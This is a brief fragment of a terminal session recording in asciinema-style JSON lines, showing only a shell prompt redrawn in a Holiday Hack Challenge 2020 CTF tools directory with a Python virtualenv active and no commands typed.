[245.88375, "o", "\u001b]2;crahan@Lexapro: ~/Projects/CTF/HolidayHackChallenge2020/Tools\u0007\u001b]1;..nge2020/Tools\u0007"]
[245.957238, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\r\n\u001b[1;36mCTF/HolidayHackChallenge2020/Tools\u001b[0m via \u001b[1;33m🐍 \u001b[0m\u001b[1;33m\u001b[0m\u001b[1;33mv3.8.3\u001b[0m\u001b[1;33m (\u001b[0m\u001b[1;33mhhc2020\u001b[0m\u001b[1;33m)\u001b[0m took \u001b[1;33m4m2s\u001b[0m \r\n\u001b[1;32m❯\u001b[0m \u001b[K"]
[245.957287, "o", "\u001b[?1h\u001b=\u001b[?2004h"]
[247.416091, "o", "\u001b[?2004l\r\r\n"]
